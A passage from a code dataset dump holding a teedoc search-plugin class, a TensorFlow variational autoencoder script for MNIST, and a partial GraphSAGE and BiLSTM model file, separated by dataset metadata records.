Plugin(Plugin_Base):\n name = \"teedoc-plugin-search\"\n desc = \"search support for teedoc\"\n defautl_config = {\n }\n\n def __init__(self, config, doc_src_path, site_config, logger = None):\n '''\n @config a dict object\n @logger teedoc.logger.Logger object\n '''\n self.logger = Fake_Logger() if not logger else logger\n self.doc_src_path = doc_src_path\n self.site_config = site_config\n self.config = Plugin.defautl_config\n self.config.update(config)\n self.logger.i(\"-- plugin <{}> init\".format(self.name))\n self.logger.i(\"-- plugin <{}> config: {}\".format(self.name, self.config))\n self.assets_abs_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"assets\")\n self.temp_dir = os.path.join(tempfile.gettempdir(), \"teedoc_plugin_search\")\n if os.path.exists(self.temp_dir):\n shutil.rmtree(self.temp_dir)\n os.makedirs(self.temp_dir)\n\n self.css = {\n \"/static/css/search/style.css\": os.path.join(self.assets_abs_path, \"style.css\"),\n }\n self.footer_js = {\n \"/static/js/search/main.js\": os.path.join(self.assets_abs_path, \"main.js\")\n }\n self.images = {\n \"/static/image/search/close.svg\": os.path.join(self.assets_abs_path, \"close.svg\"),\n \"/static/image/search/search.svg\": os.path.join(self.assets_abs_path, \"search.svg\"),\n }\n \n # set site_root_url env value\n if not \"env\" in config:\n config['env'] = {}\n config['env'][\"site_root_url\"] = self.site_config[\"site_root_url\"]\n # replace variable in css with value\n vars = config[\"env\"]\n self.css = self._update_file_var(self.css, vars, self.temp_dir)\n self.footer_js = self._update_file_var(self.footer_js, vars, self.temp_dir)\n # files to copy\n self.html_header_items = self._generate_html_header_items()\n self.files_to_copy = 
{}\n self.files_to_copy.update(self.css)\n self.files_to_copy.update(self.footer_js)\n self.files_to_copy.update(self.images)\n\n self.html_js_items = self._generate_html_js_items()\n self.content = {\n \"articles\": {},\n \"pages\": {}\n }\n\n def __del__(self):\n if os.path.exists(self.temp_dir):\n try:\n shutil.rmtree(self.temp_dir)\n except Exception:\n pass\n\n def _generate_html_header_items(self):\n items = []\n # css\n for url in self.css:\n item = ''.format(url)\n items.append(item)\n return items\n\n def _generate_html_js_items(self):\n items = []\n for url in self.footer_js:\n item = ''.format(url)\n items.append(item)\n return items\n\n def _update_file_var(self, files, vars, temp_dir):\n for url, path in files.items():\n with open(path, encoding='utf-8') as f:\n content = f.read()\n for k, v in vars.items():\n content = content.replace(\"${}{}{}\".format(\"{\", k.strip(), \"}\"), v)\n temp_path = os.path.join(temp_dir, os.path.basename(path))\n with open(temp_path, \"w\", encoding='utf-8') as fw:\n fw.write(content)\n files[url] = temp_path\n return files\n \n\n def on_add_html_header_items(self):\n return self.html_header_items\n \n def on_add_html_js_items(self):\n return self.html_js_items\n \n def on_add_navbar_items(self, new_config):\n '''\n @config config cover self.config\n '''\n search_hint = \"Search\"\n search_input_hint = \"Keywords separated by space\"\n search_loading_hint = \"Loading, wait please ...\"\n search_download_err_hint = \"Download error, please check network and refresh again\"\n search_other_docs_result_hint = \"Result from other docs\"\n search_curr_doc_result_hint = \"Result from current doc\"\n if \"search_hint\" in new_config:\n search_hint = new_config[\"search_hint\"]\n elif \"search_hint\" in self.config:\n search_hint = self.config[\"search_hint\"]\n if \"input_hint\" in new_config:\n search_input_hint = new_config[\"input_hint\"]\n elif \"input_hint\" in self.config:\n search_input_hint = self.config[\"input_hint\"]\n if \"loading_hint\" in new_config:\n search_loading_hint = new_config[\"loading_hint\"]\n elif \"loading_hint\" in self.config:\n search_loading_hint = self.config[\"loading_hint\"]\n if \"download_err_hint\" in new_config:\n search_download_err_hint = new_config[\"download_err_hint\"]\n elif \"download_err_hint\" in self.config:\n search_download_err_hint = self.config[\"download_err_hint\"]\n if \"other_docs_result_hint\" in new_config:\n search_other_docs_result_hint = new_config[\"other_docs_result_hint\"]\n elif \"other_docs_result_hint\" in self.config:\n search_other_docs_result_hint = self.config[\"other_docs_result_hint\"]\n if \"curr_doc_result_hint\" in new_config:\n search_curr_doc_result_hint = new_config[\"curr_doc_result_hint\"]\n elif \"curr_doc_result_hint\" in self.config:\n search_curr_doc_result_hint = self.config[\"curr_doc_result_hint\"] \n search_btn = '''{}\n
\n {}\n {}\n {}\n {}\n {}\n
'''.format(\n search_hint, search_input_hint, search_loading_hint, search_download_err_hint, search_other_docs_result_hint, search_curr_doc_result_hint)\n items = [search_btn]\n return items\n \n def on_copy_files(self):\n return self.files_to_copy\n\n def on_htmls(self, htmls_files, htmls_pages):\n '''\n update htmls, may not all html, just partially\n htmls_files: {\n \"/get_started/zh\":{\n \"url\":{\n \"title\": \"\",\n \"desc\": \"\",\n \"keywords\": [],\n \"body\": html,\n \"url\": \"\",\n \"raw\": \"\"\n }\n }\n }\n '''\n # for file, html in htmls_files.items():\n # self.content[\"articles\"][html[\"url\"]] = html[\"raw\"]\n # for file, html in htmls_pages.items():\n # self.content[\"pages\"][html[\"url\"]] = html[\"raw\"]\n docs_url = htmls_files.keys()\n pages_url = htmls_pages.keys()\n index_content = {}\n sub_index_path = []\n generated_index_json = {}\n for i, url in enumerate(docs_url):\n index_content[url] = \"{}static/search_index/index_{}.json\".format(self.site_config[\"site_root_url\"], i)\n path = os.path.join(self.temp_dir, \"index_{}.json\".format(i))\n sub_index_path.append(path)\n # write content to sub index file\n with open(path, \"w\", encoding=\"utf-8\") as f:\n htmls_files[url][\"body\"] = \"\" # remove body, only use raw\n json.dump(htmls_files[url], f, ensure_ascii=False)\n for i, url in enumerate(pages_url, len(docs_url)):\n index_content[url] = \"{}static/search_index/index_{}.json\".format(self.site_config[\"site_root_url\"], i)\n path = os.path.join(self.temp_dir, \"index_{}.json\".format(i))\n sub_index_path.append(path)\n # write content to sub index file\n with open(path, \"w\", encoding=\"utf-8\") as f:\n htmls_pages[url][\"body\"] = \"\" # remove body, only use raw\n json.dump(htmls_pages[url], f, ensure_ascii=False)\n # write content to files\n # index file\n index_path = os.path.join(self.temp_dir, \"index.json\")\n with open(index_path, \"w\", encoding=\"utf-8\") as f:\n json.dump(index_content, f, ensure_ascii=False)\n\n # add to copy file list\n generated_index_json[\"/static/search_index/index.json\"] = index_path\n for i, path in enumerate(sub_index_path):\n generated_index_json[\"/static/search_index/index_{}.json\".format(i)] = path\n self.files_to_copy.update(generated_index_json)\n \n\n\n\nif __name__ == \"__main__\":\n config = {\n }\n plug = Plugin(config=config)\n\n","sub_path":"plugins/teedoc-plugin-search/teedoc_plugin_search/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"635099873","text":"import tensorflow as tf \nimport numpy as np \nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport math\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets('/tmp/data',one_hot=True);\n\ntf.set_random_seed(0);\n\n#tuning_knobs\nlearning_rate = 0.001;\nbatch_size = 128;\nn_epochs = 500; \n\n#model params\nz_dim = 32;\n\ntfd = tf.contrib.distributions #we will use this to calculate kl-divergence\n\nX = tf.placeholder(tf.float32,[None,784]);\nepoch_number = tf.placeholder(tf.float32,[]);\n\ndef get_activations(name,input_image,session):\n\tactvtns = session.run(name,feed_dict={X:input_image});\n\treturn actvtns;\n\ndef encoder_dist(X,isTrainable=True,reuse=False,name='encoder'):\n\twith tf.variable_scope(name,reuse=tf.AUTO_REUSE) as scope:\n\t\tX = tf.reshape(X,[-1,28,28,1]);\n\t\toutputs={};\n\t\tconv1 = 
tf.layers.conv2d(X,filters=16,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='conv1_layer');\n\t\tconv1 = tf.layers.batch_normalization(conv1,name='conv1_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\tconv1 = tf.nn.max_pool(conv1,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME',name='conv1_layer_maxpool');\n\t\t\n\t\toutputs['conv1'] = conv1;\n\t\t\n\t\tconv2 = tf.layers.conv2d(conv1,filters=32,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='conv2_layer');\n\t\tconv2 = tf.layers.batch_normalization(conv2,name='conv2_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\tconv2 = tf.nn.max_pool(conv2,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME',name='conv2_layer_maxpool');\n\t\t\n\t\toutputs['conv2'] = conv2;\n\n\t\tconv3 = tf.layers.conv2d(conv2,filters=32,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='conv3_layer');\n\t\tconv3 = tf.layers.batch_normalization(conv3,name='conv3_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\tconv3 = tf.nn.max_pool(conv3,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME',name='conv3_layer_maxpool');\n\t\t\n\t\toutputs['conv3'] = conv3;\n\t\tconv3_flt = tf.layers.flatten(conv3,name='flattened_conv3');\n\t\n\twith tf.variable_scope('VAE_mean_and_var_'+name) as scope:\n\n\t\tmean_fc = tf.layers.dense(conv3_flt,z_dim,trainable=True,reuse=False,activation=tf.nn.tanh,name='mean_fully_connected');\n\t\tvar_fc = tf.layers.dense(conv3_flt,z_dim,activation=tf.nn.softplus,trainable=True,reuse=False,name='var_fully_connected');\n\t\t\n\t\tdist = tfd.MultivariateNormalDiag(mean_fc,var_fc);\n\t\treturn dist,outputs;\n\ndef decoder(Z,isTrainable=True,reuse=False,name='decoder'):\n\twith tf.variable_scope(name) as scope:\n\t\tZ = tf.layers.dense(Z,4*4*32,activation=tf.nn.tanh,trainable=isTrainable,reuse=reuse,name='fully_connected_decoder_from_z_dim');\n\t\toutputs={};\n\t\tZ = tf.reshape(Z,[-1,4,4,32]);\n\t\t\n\t\tdeconv1 = tf.image.resize_images(Z,size=[7,7],align_corners=False);\n\t\tdeconv1 = tf.layers.conv2d_transpose(deconv1,filters=32,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='deconv1_layer');\n\t\tdeconv1 = tf.layers.batch_normalization(deconv1,name='deconv1_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\toutputs['deconv1'] = deconv1;\n\t\t\n\t\tdeconv2 = tf.image.resize_images(deconv1,size=[14,14],align_corners=False);\n\t\tdeconv2 = tf.layers.conv2d_transpose(deconv2,filters=16,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='deconv2_layer');\n\t\tdeconv2 = tf.layers.batch_normalization(deconv2,name='deconv2_layer_batchnorm',trainable=isTrainable,reuse=reuse);\n\t\toutputs['deconv2'] = deconv2;\n\t\t\n\t\tdeconv3 = tf.image.resize_images(deconv2,size=[28,28],align_corners=False);\n\t\tdeconv3 = tf.layers.conv2d_transpose(deconv3,filters=1,kernel_size=[3,3],strides=(1,1),padding='SAME',activation=tf.nn.leaky_relu,trainable=isTrainable,reuse=reuse,name='deconv3_layer');\n\t\toutputs['deconv3'] = deconv3;\n\t\tdeconv3_reshaped = tf.reshape(deconv3,[-1,784]);\n\t\treturn deconv3_reshaped,outputs;\n\nprior_dist = tfd.MultivariateNormalDiag(tf.zeros(z_dim),tf.ones(z_dim));\nposterior_dist,encoder_outputs = encoder_dist(X,isTrainable=False);\n\n## z_sample = posterior_dist.sample();\nepsilon_value = 
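The epsilon_value and z_sample statements here implement the reparameterization trick: instead of sampling z from the posterior directly, draw eps ~ N(0, I) and form z = mean + stddev * eps, so the sample stays differentiable with respect to the encoder outputs. A minimal NumPy illustration (all values are stand-ins, not taken from the model):

import numpy as np

rng = np.random.default_rng(0)
mu = np.array([0.5, -1.0])           # posterior mean (stand-in values)
sigma = np.array([0.1, 0.3])         # posterior stddev (stand-in values)
eps = rng.standard_normal(mu.shape)  # eps ~ N(0, I)
z = mu + sigma * eps                 # z ~ N(mu, sigma^2), gradient-friendly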
tfd.MultivariateNormalDiag(tf.zeros(z_dim),tf.ones(z_dim)).sample(tf.shape(X)[0]);\nz_sample = tf.add(posterior_dist.mean(),tf.multiply(posterior_dist.stddev(),epsilon_value));\n#z_sample = tf.placeholder(tf.float32,[None,z_dim]);\nreconstruction,decoder_outputs = decoder(z_sample);\nreconstruction_loss = tf.reduce_mean(tf.pow(X - reconstruction,2));\nKL_loss = tf.reduce_mean(tfd.kl_divergence(posterior_dist,prior_dist));\n\nkl_weight = 1.0 / (1.0 + tf.exp(-epoch_number/3+4));\n\nkl_weight *= 0.001;\nloss = kl_weight*KL_loss + reconstruction_loss;\n\n#####changes#####\n\n\n#optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(loss);\n\n\n## FOR TENSORBOARD ##\n\nenc_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,scope='encoder');\nVAE_mean_and_var_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,scope='VAE_mean_and_var_'+'encoder');\ndec_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,scope='decoder');\n\noptimizer = tf.train.AdamOptimizer(learning_rate = learning_rate);\n\nupdate_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS);\nwith tf.control_dependencies(update_ops):\n\tgradsVars = optimizer.compute_gradients(loss, tf.trainable_variables());\n\ttrain_optimizer = optimizer.apply_gradients(gradsVars);\n\ntf.summary.scalar(\"reconstruction_loss\",reconstruction_loss);\ntf.summary.scalar(\"KL_loss\",KL_loss);\n\nmerged_all = tf.summary.merge_all();\nlog_directory = 'Modified-VAE-dir';\nmodel_directory='Modified-VAE-model_dir';\n\nsave_model_directory = 'Reconstruction-VAE-model_dir';\n\nif not os.path.exists(log_directory):\n os.makedirs(log_directory);\nif not os.path.exists(model_directory):\n os.makedirs(model_directory);\n####################################\n\n\n\n#code = encoder(X);\n\ndef train_model():\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer());\n\n\t\tn_batches = mnist.train.num_examples/batch_size;\n\t\tn_batches = int(n_batches);\n\n\t\tsaver = tf.train.Saver();\n\n\t\tparams = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='encoder');\n\t\tsaver = tf.train.Saver(var_list=params);\n\n\t\tprint('----------------PARAMS-----------------');\n\t\tfor var in params:\n\t\t print (var.name+\"\\t\");\n\t\tprint('---------------------------------');\n\n\t\tstring = save_model_directory+'/model_'+str(98); \n\n\t\ttry:\n\t\t saver.restore(sess, string);\n\t\texcept:\n\t\t print(\"Previous weights not found of encoder\"); \n\t\t sys.exit(0);\n\n\t\tprint('---------------------------------');\n\t\tprint (\"Model loaded\");\n\t\tprint('---------------------------------');\n\t\tsaver = tf.train.Saver();\n\t\t\n\t\twriter = tf.summary.FileWriter(log_directory,sess.graph);\n\t\t\n\t\ttrain_list = tf.trainable_variables();\n\n\t\tprint('----------------TRAINABLE_VARIABLES----------------');\n\t\tfor it in train_list:\n\t\t\tprint(it.name+\"\\t\");\n\n\t\tprint('---------------------------------------------------');\n\t\t\n\t\tfor epoch in range(n_epochs):\n\t\t\tepoch_loss = 0;\n\t\t\tepoch_KL_loss = 0;\n\t\t\tepoch_reconstruction_loss = 0;\n\t\t\tfor batch in range(n_batches):\n\t\t\t\tX_batch,_ = mnist.train.next_batch(batch_size);\n\t\t\t\t_,batch_cost,merged,batch_KL_loss,batch_reconstruction_loss = sess.run([train_optimizer,loss,merged_all,KL_loss,reconstruction_loss],feed_dict={X:X_batch,epoch_number:epoch});\n\t\t\t\tepoch_loss += batch_cost;\n\t\t\t\tepoch_KL_loss += batch_KL_loss;\n\t\t\t\tepoch_reconstruction_loss += 
batch_reconstruction_loss;\n\t\t\t\twriter.add_summary(merged,epoch*n_batches+batch);\n\t\t\tprint('At epoch #',epoch,' loss is ',epoch_loss ,' where recons loss : ',epoch_reconstruction_loss,' and KL_loss : ',epoch_KL_loss);\n\t\t\tif(epoch % 2) == 0:\n\t\t\t\tsave_path = saver.save(sess, model_directory+'/model_'+str(epoch));\n\t\t\t\tprint(\"At epoch #\",epoch,\" Model is saved at path: \",save_path);\n\t\tprint('Optimization Done !!');\n\t\tn = 5;\n\t\t\n\t\treconstructed = np.empty((28*n,28*n));\n\t\toriginal = np.empty((28*n,28*n));\n\n\t\tfor i in range(n):\n\t\t\t\n\t\t\tbatch_X,_ = mnist.test.next_batch(n);\n\t\t\trecons = sess.run(reconstruction,feed_dict={X:batch_X});\n\t\t\tprint ('recons : ',recons.shape);\n\t\t\trecons = np.reshape(recons,[-1,784]);\n\t\t\tprint ('recons : ',recons.shape);\n\n\t\t\tfor j in range(n):\n\t\t \toriginal[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = batch_X[j].reshape([28, 28]);\n\n\t\t\tfor j in range(n):\n\t\t\t\treconstructed[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = recons[j].reshape([28, 28]);\n\n\t\tprint(\"Original Images\");\n\t\tplt.figure(figsize=(n, n));\n\t\tplt.imshow(original, origin=\"upper\", cmap=\"gray\");\n\t\tplt.savefig('original_new_vae.png');\n\n\t\tprint(\"Reconstructed Images\");\n\t\tplt.figure(figsize=(n, n));\n\t\tplt.imshow(reconstructed, origin=\"upper\", cmap=\"gray\");\n\t\tplt.savefig('reconstructed_new_vae.png');\n\t\t\n\t\t\n\ndef generateSample():\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\t\tsaver = tf.train.Saver();\n\n\t\tparams = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='decoder');\n\t\tsaver = tf.train.Saver(var_list=params);\n\n\t\tfor var in params:\n\t\t print (var.name+\"\\t\");\n\n\t\tstring = model_directory+'/model_'+str(n_epochs-2); \n\n\t\ttry:\n\t\t saver.restore(sess, string);\n\t\texcept:\n\t\t print(\"Previous weights not found of decoder\"); \n\t\t sys.exit(0);\n\n\t\tprint (\"Model loaded\");\n\t\tsaver = tf.train.Saver();\n\n\t\tsample = tf.random_normal([1,z_dim]);\n\t\trecons = sess.run(reconstruction,feed_dict={z_sample:sample.eval()});\n\t\tplt.imshow(np.reshape(recons,[28,28]), interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.title('Generated Image');\n\t\tplt.savefig('gen-img.png');\n\ndef plot_conv_layers():\n\twith tf.Session() as sess:\n\t\tsess.run(tf.global_variables_initializer())\n\t\tsaver = tf.train.Saver();\n\n\t\tparams = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='encoder');\n\t\tsaver = tf.train.Saver(var_list=params);\n\n\t\tfor var in params:\n\t\t print (var.name+\"\\t\");\n\n\t\tstring = model_directory+'/model_'+str(n_epochs-2); \n\n\t\ttry:\n\t\t saver.restore(sess, string);\n\t\texcept:\n\t\t print(\"Previous weights not found of decoder\"); \n\t\t sys.exit(0);\n\n\t\tprint (\"Model loaded\");\n\t\tsaver = tf.train.Saver();\n\n\t\tif not os.path.exists('out'):\n\t\t\tos.makedirs('out');\n\n\t\tx_img,y_img = mnist.train.next_batch(1);\n\t\tplt.imshow(np.reshape(x_img,[28,28]), interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.title('Original Image');\n\t\tplt.savefig('out/real-img');\n\n\t\tencoder_output = sess.run(encoder_outputs,feed_dict={X:x_img});\n\t\tprint ('conv1 shape--> ',encoder_output['conv1'].shape);\n\t\tprint ('conv2 shape--> ',encoder_output['conv2'].shape);\n\n\t\t#plt.subplots_adjust(left=0.125, bottom=0.01, right=0.9, top=0.9, wspace=0.5, hspace=0.001)\n\n\t\top = encoder_output['conv1'];\n\t\tfilters = op.shape[3];\n\t\tplt.figure(1, figsize=(20,20));\n\t\tn_columns = 
8;\n\t\tn_rows = math.ceil(filters / n_columns) + 1;\n\t\t\n\t\tfor i in range(filters):\n\t\t\tplt.subplot(n_rows, n_columns, i+1);\n\t\t\tplt.title('Filter ' + str(i));\n\t\t\tplt.imshow(op[0,:,:,i], interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.tight_layout();\n\t\tplt.savefig('out/conv1-op');\n\n\t\top = encoder_output['conv2'];\n\t\tfilters = op.shape[3];\n\t\tplt.figure(2, figsize=(30,30));\n\t\tn_columns = 8;\n\t\tn_rows = math.ceil(filters / n_columns) + 1;\n\t\tfor i in range(filters):\n\t\t\tplt.subplot(n_rows, n_columns, i+1);\n\t\t\tplt.title('Filter ' + str(i));\n\t\t\tplt.imshow(op[0,:,:,i], interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.tight_layout();\n\t\tplt.savefig('out/conv2-op');\n\n\t\top = encoder_output['conv3'];\n\t\tfilters = op.shape[3];\n\t\tplt.figure(3, figsize=(30,30));\n\t\tn_columns = 8;\n\t\tn_rows = math.ceil(filters / n_columns) + 1;\n\t\tfor i in range(filters):\n\t\t\tplt.subplot(n_rows, n_columns, i+1);\n\t\t\tplt.title('Filter ' + str(i));\n\t\t\tplt.imshow(op[0,:,:,i], interpolation=\"nearest\", cmap=\"gray\");\n\t\tplt.tight_layout();\n\t\tplt.savefig('out/conv3-op');\n\n\n#train_model();\ngenerateSample();\t\nplot_conv_layers();\n","sub_path":"_site/alpha.py","file_name":"alpha.py","file_ext":"py","file_size_in_byte":11872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"154701117","text":"from collections import namedtuple\r\nimport tensorflow as tf\r\nfrom aggregators import MaxPoolingAggregator\r\n\r\n\r\nclass BilstmModel(tf.keras.Model):\r\n def __init__(self, dims0, dims1,batch_size, **kwargs):\r\n\r\n super(BilstmModel, self).__init__(**kwargs)\r\n \r\n self.output_dim_bottom = 200\r\n self.output_dim_top = 200\r\n self.number_of_words = dims0\r\n self.dim_embed = dims1\r\n self.batch_size= batch_size\r\n self.masker = tf.keras.layers.Masking(mask_value = 0.,input_shape = (self.number_of_words,self.dim_embed))\r\n\r\n # Word Embedding Layer\r\n def build(self, inputs):\r\n print(self.number_of_words)\r\n self.w = tf.Variable(tf.random.uniform([1,2*self.output_dim_top]), name = \"attention\")\r\n # self.embedding =tf.keras.layers.Embedding(input_dim=self.number_of_words, output_dim=16, mask_zero=True)\r\n \r\n self.forward_layer = tf.keras.layers.LSTM(self.output_dim_bottom,dropout = 0.5, return_sequences=True,recurrent_activation = 'sigmoid', input_shape=(self.number_of_words, self.dim_embed))\r\n # self.backward_layer = tf.keras.layers.LSTM(self.output_dim_top,dropout = 0.2, return_sequences=True, go_backwards=True, input_shape = (self.number_of_words, self.dim_embed))\r\n self.bilstm = tf.keras.layers.Bidirectional(self.forward_layer, merge_mode = \"concat\")\r\n\r\n\r\n def call(self, inputs, training=None, mask=None):\r\n w1 = tf.tile(tf.expand_dims(self.w, axis = 0), [inputs.shape[0], 1,1 ])\r\n #rajouter le batch size a la place de 100 \r\n #masque = self.embedding.compute_mask(inputs)\r\n #print(\"masque dim\", masque.shape)\r\n #print(\"inputs dim\", inputs.shape)\r\n # print(self.masker(inputs))\r\n inputs2 = self.masker(inputs)\r\n sortie1 = self.bilstm(inputs2)\r\n #print(sortie1.shape, \"sum shape\")\r\n \r\n #print(sortie1.shape)\r\n \r\n b = tf.matmul(w1,tf.transpose(sortie1,[0,2,1]))\r\n #print(\"b shape\", b.shape)\r\n alpha = tf.nn.softmax(b, axis =2)\r\n #print(\"alpha shape\", alpha.shape)\r\n sortie2 = tf.matmul(alpha, sortie1)\r\n sortie3 = tf.squeeze(sortie2, axis = 1)\r\n #print(sortie3.shape)\r\n return sortie3\r\n\r\n\r\n\r\n\r\n# SAGEInfo is a 
namedtuple that specifies the parameters\r\n# of the recursive GraphSAGE layers\r\nSAGEInfo = namedtuple(\"SAGEInfo\",\r\n ['layer_name', # name of the layer (to get feature embedding etc.)\r\n 'neigh_sampler', # callable neigh_sampler constructor\r\n 'num_samples',\r\n 'output_dim' # the output (i.e., hidden) dimension\r\n ])\r\n\r\nclass SampleAndAggregate(tf.keras.Model):\r\n \"\"\"\r\n Base implementation of unsupervised GraphSAGE\r\n \"\"\"\r\n\r\n def __init__(self, features, adj, degrees,\r\n layer_infos,\r\n **kwargs):\r\n '''\r\n Args:\r\n - placeholders: Stanford TensorFlow placeholder object.\r\n - features: Numpy array with node features. \r\n NOTE: Pass a None object to train in featureless mode (identity features for nodes)!\r\n - adj: Numpy array with adjacency lists (padded with random re-samples)\r\n - degrees: Numpy array with node degrees. \r\n - layer_infos: List of SAGEInfo namedtuples that describe the parameters of all \r\n the recursive layers. See SAGEInfo definition above.\r\n - concat: whether to concatenate during recursive iterations\r\n - aggregator_type: how to aggregate neighbor information\r\n - model_size: one of \"small\" and \"big\"\r\n - identity_dim: Set to positive int to use identity features (slow and cannot generalize, but better accuracy)\r\n '''\r\n super(SampleAndAggregate, self).__init__(**kwargs)\r\n\r\n self.aggregator_cls = MaxPoolingAggregator\r\n self.model_size = 512\r\n\r\n #INUTILE???????????\r\n #self.adj_info = adj\r\n\r\n\r\n\r\n '''\r\n if identity_dim > 0:\r\n self.embeds = tf.get_variable(\"node_embeddings\", [adj.get_shape().as_list()[0], identity_dim])\r\n else:\r\n self.embeds = None\r\n if features is None: \r\n if identity_dim == 0:\r\n raise Exception(\"Must have a positive value for identity feature dimension if no input features given.\")\r\n self.features = self.embeds\r\n else:\r\n self.features = tf.Variable(tf.constant(features, dtype=tf.float32), trainable=False)\r\n if not self.embeds is None:\r\n self.features = tf.concat([self.embeds, self.features], axis=1)\r\n '''\r\n\r\n self.adj = adj\r\n self.features = features\r\n self.degrees = degrees\r\n self.dims = [len(self.features[0])]\r\n self.dims.extend([layer_infos[i].output_dim for i in range(len(layer_infos))])\r\n \r\n self.batch_size = 100\r\n self.layer_infos = layer_infos\r\n #self.optimizer = tf.keras.optimizers.Adam(learning_rate=0.01)\r\n self.aggregators = None\r\n\r\n def sample(self, inputs, layer_infos):\r\n \"\"\" Sample neighbors to be the supportive fields for multi-layer convolutions.\r\n\r\n Args:\r\n inputs: batch inputs\r\n batch_size: the number of inputs (different for batch inputs and negative samples).\r\n \"\"\"\r\n \r\n\r\n batch_size = inputs.shape[0]\r\n samples = [inputs]\r\n # size of convolution support at each layer per node\r\n support_size = 1\r\n support_sizes = [support_size]\r\n for k in range(len(layer_infos)):\r\n \r\n t = len(layer_infos) - k - 1\r\n support_size *= layer_infos[t].num_samples\r\n sampler = layer_infos[t].neigh_sampler\r\n\r\n node = sampler((samples[k], layer_infos[t].num_samples))\r\n \r\n samples.append(tf.reshape(node, [support_size * batch_size,]))\r\n support_sizes.append(support_size)\r\n return samples, support_sizes\r\n\r\n\r\n def aggregate(self, samples, input_features, dims, num_samples, support_sizes,\r\n name=None, concat=False, model_size=\"small\"):\r\n \"\"\" At each layer, aggregate hidden representations of neighbors to compute the hidden representations \r\n at next layer.\r\n Args:\r\n 
samples: a list of samples of variable hops away for convolving at each layer of the\r\n network. Length is the number of layers + 1. Each is a vector of node indices.\r\n input_features: the input features for each sample of various hops away.\r\n dims: a list of dimensions of the hidden representations from the input layer to the\r\n final layer. Length is the number of layers + 1.\r\n num_samples: list of number of samples for each layer.\r\n support_sizes: the number of nodes to gather information from for each layer.\r\n batch_size: the number of inputs (different for batch inputs and negative samples).\r\n Returns:\r\n The hidden representation at the final layer for all nodes in batch\r\n \"\"\"\r\n\r\n\r\n batch_size = self.batch_size\r\n\r\n # length: number of layers + 1\r\n\r\n hidden = [tf.nn.embedding_lookup(input_features, node_samples) for node_samples in samples]\r\n #hidden = features de tous les nodes qui sont à une certaine distance\r\n #en pratique on prendra input_features = [features] donc tous les titres des noeuds.\r\n new_agg = self.aggregators is None\r\n if new_agg:\r\n self.aggregators = []\r\n #len(num_samples) est le nombre de layers K\r\n \r\n for layer in range(len(num_samples)):\r\n if new_agg:\r\n dim_mult = 2 if (layer!=0) else 1\r\n # aggregator at current layer\r\n if layer == len(num_samples) - 1:\r\n #si on est à la fin, l'activation est l'identité\r\n aggregator = self.aggregator_cls(dim_mult*dims[layer], dims[layer+1], act=lambda x : x,\r\n dropout=0.2)\r\n else:\r\n #sinon l'activation est le relu (de base)\r\n aggregator = self.aggregator_cls(dim_mult*dims[layer], dims[layer+1], act = tf.keras.activations.relu,\r\n dropout=0.2)\r\n self.aggregators.append(aggregator)\r\n else:\r\n aggregator = self.aggregators[layer]\r\n # hidden representation at current layer for all support nodes that are various hops away\r\n next_hidden = []\r\n # as layer increases, the number of support nodes needed decreases\r\n for hop in range(len(num_samples) - layer):\r\n dim_mult = 2 if (layer!=0) else 1\r\n neigh_dims = [batch_size * support_sizes[hop], \r\n num_samples[len(num_samples) - hop - 1], \r\n dim_mult*dims[layer]]\r\n\r\n h = aggregator((hidden[hop],tf.reshape(hidden[hop + 1], neigh_dims)))\r\n next_hidden.append(h)\r\n hidden = next_hidden\r\n\r\n\r\n return hidden[0]\r\n #on prend 0 car on s'intéresse juste aux embeddings des noeuds de base\r\n\r\n def call(self, inputs, training=None, mask=None):\r\n\r\n \r\n inputs1 = inputs[\"batch1\"]\r\n self.batch_size = inputs1.shape[0]\r\n #inputs1: noeud 1\r\n inputs2 = inputs[\"batch2\"]\r\n\r\n #inputs2: noeud 2\r\n \r\n # perform \"convolution\"\r\n samples1, support_sizes1 = self.sample(inputs1, self.layer_infos)\r\n\r\n samples2, support_sizes2 = self.sample(inputs2, self.layer_infos)\r\n\r\n num_samples = [layer_info.num_samples for layer_info in self.layer_infos]\r\n outputs1 = self.aggregate(samples1, [self.features], self.dims, num_samples, support_sizes1)\r\n outputs2 = self.aggregate(samples2, [self.features], self.dims, num_samples, support_sizes2)\r\n\r\n\r\n outputs1 = 